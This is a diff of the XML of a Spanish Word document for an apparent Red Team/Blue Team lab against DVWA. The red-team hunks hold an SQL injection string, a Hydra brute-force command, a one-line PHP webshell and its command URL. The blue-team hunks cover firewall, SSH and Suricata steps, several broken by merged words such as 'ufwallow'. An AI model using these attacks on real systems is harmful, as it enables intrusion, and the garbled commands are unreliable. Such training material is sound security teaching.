+        </w:rPr>
+        <w:t>Ver cabeceras</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Código</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">curl -I </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId14" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipervnculo"/>
+          </w:rPr>
+          <w:t>http://192.168.0.91</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="es-ES"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="3042138" cy="1647825"/>
+            <wp:effectExtent l="19050" t="0" r="5862" b="0"/>
+            <wp:docPr id="1238274441" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1238274441" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3042138" cy="1647825"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Navegar DVWA y ver vulnerabilidades disponibles</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Página principal de DVWA</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerabilidades detectadas por Nikto</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Cabeceras inseguras</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>FASE 3 – Explotación Web (DVWA)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>DVWA tiene vulnerabilidades para practicar:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>SQL Injection (Low)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Entra en DVWA → SQL Injection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Prueba:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Código</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>' OR '1'='1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="es-ES"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4448046" cy="3486150"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="1584283261" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1584283261" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4451385" cy="3488767"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="es-ES"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5400040" cy="1981200"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="3" name="2 Imagen" descr="Captura.PNG"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Captura.PNG"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="1981200"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Brute Force (con Hydra si te lo permiten)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Código</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.91 http-post-form "/dvwa/login.php:username=^USER^&amp;password=^PASS^&amp;Login=Login:Loginfailed"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>File Upload (Low)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Sube un webshell PHP:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Código</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;?phpsystem($_GET['cmd']); ?&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Accede:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Código</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>http://192.168.0.91/dvwa/hackable/uploads/shell.php?cmd=id</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:pict>
           <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
@@ -499,15 +1385,23 @@
           <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
           <w:b/>
           <w:bCs/>
-        </w:rPr>
-        <w:t>🟦</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Blue Team (Defensa)</w:t>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+        </w:rPr>
+        <w:t>🟥</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Blue Team (Defensa)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -534,13 +1428,8 @@
           <w:numId w:val="8"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Hardening</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (SSH, Apache)</w:t>
+      <w:r>
+        <w:t>Hardening (SSH, Apache)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -551,15 +1440,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Firewall (UFW/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>iptables</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t>Firewall (UFW/iptables)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -586,7 +1467,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:pict w14:anchorId="10757B1D">
+        <w:pict>
           <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
@@ -618,6 +1499,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Red Team</w:t>
       </w:r>
     </w:p>
@@ -628,11 +1510,9 @@
           <w:numId w:val="11"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>nmap</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -641,11 +1521,9 @@
           <w:numId w:val="11"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>nikto</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -654,11 +1532,9 @@
           <w:numId w:val="11"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>curl</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -667,45 +1543,8 @@
           <w:numId w:val="11"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>burpsuite</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (o OWASP ZAP)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="11"/>
-        </w:numPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hydra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (solo si tú lo autorizas y con límites)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="11"/>
-        </w:numPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sqlmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (si quieres modalidad avanzada)</w:t>
+      <w:r>
+        <w:t>hydra (solo si tú lo autorizas y con límites)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -730,19 +1569,9 @@
           <w:numId w:val="12"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ufw</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>iptables</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>ufw / iptables</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -751,11 +1580,9 @@
           <w:numId w:val="12"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>journalctl</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -765,15 +1592,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>logs Apache (/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/log/apache2/access.log / error.log)</w:t>
+        <w:t>logs Apache (/var/log/apache2/access.log / error.log)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -783,21 +1602,11 @@
           <w:numId w:val="12"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tcpdump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">suricata </w:t>
+      <w:r>
+        <w:t>fail2ban</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -831,7 +1640,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>DEFENSA DEL BLUE TEAM</w:t>
       </w:r>
     </w:p>
@@ -856,23 +1664,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">1. Fase de Configuración y </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Hardening</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Prevención)</w:t>
+        <w:t>1. Fase de Configuración y Hardening (Prevención)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -906,29 +1698,8 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ufw</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> default </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>deny</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>incoming</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>sudo ufw default denyincoming</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -938,29 +1709,8 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ufw</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>allow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 80/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>sudo ufwallow 80/tcp</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -970,29 +1720,8 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ufw</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>allow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 22/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>sudo ufwallow 22/tcp</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1002,21 +1731,8 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ufw</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>enable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>sudo ufwenable</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1033,53 +1749,13 @@
         <w:t>Aseguramiento de SSH:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Editamos /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ssh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sshd_config</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> para deshabilitar el acceso de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>root</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>PermitRootLogin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> no.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="23C93264">
-          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        <w:t xml:space="preserve"> Editamos /etc/ssh/sshd_config para deshabilitar el acceso de root: PermitRootLogin no.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict>
+          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -1100,6 +1776,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Para detectar al Red Team, configuramos </w:t>
       </w:r>
       <w:r>
@@ -1130,17 +1807,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Editamos </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>suricata.yaml</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> para que escuche en nuestra interfaz de red (ej. eth0 o enp0s3) y activamos el modo promiscuo para capturar todo el tráfico del segmento.</w:t>
+        <w:t>Editamos suricata.yaml para que escuche en nuestra interfaz de red (ej. eth0 o enp0s3) y activamos el modo promiscuo para capturar todo el tráfico del segmento.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1151,29 +1818,8 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> link set eth0 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>promisc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>on</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>sudo ip link set eth0 promiscon</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1183,31 +1829,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>sudo suricata-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>update</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (Para cargar firmas de ataques reales como </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>SQLi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>).</w:t>
+        <w:t>sudo suricata-update (Para cargar firmas de ataques reales como Nmap o SQLi).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1227,45 +1849,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Usamos el comando que ya has probado con éxito para filtrar solo los ataques: sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tail</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -f /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/log/suricata/fast.log | grep -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>iE</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>SCAN|SQL|Exploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="789EEE8E">
-          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        <w:t>Usamos el comando que ya has probado con éxito para filtrar solo los ataques: sudo tail -f /var/log/suricata/fast.log | grep -iE "SCAN|SQL|Exploit"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict>
+          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -1281,27 +1871,21 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>3. Fase de Respuesta ante Incidentes (Documentación)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Aquí es donde usas las capturas que ya tienes. Según tu imagen image_3e8a18.png, el ataque ha sido detectado.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">3. Fase de Respuesta ante Incidentes </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>Evidencia 1: Detección del Ataque</w:t>
       </w:r>
     </w:p>
@@ -1320,31 +1904,7 @@
         <w:t>Hallazgo</w:t>
       </w:r>
       <w:r>
-        <w:t>: Se detecta un escaneo de puertos masivo y un intento de acceso a directorios administrativos (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ColdFusion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>administrator</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>access</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>).</w:t>
+        <w:t>: Se detecta un escaneo de puertos masivo y un intento de acceso a directorios administrativos (ColdFusionadministratoraccess).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1388,11 +1948,12 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:eastAsia="es-ES"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EF18166" wp14:editId="69ED355D">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5399290" cy="3338623"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
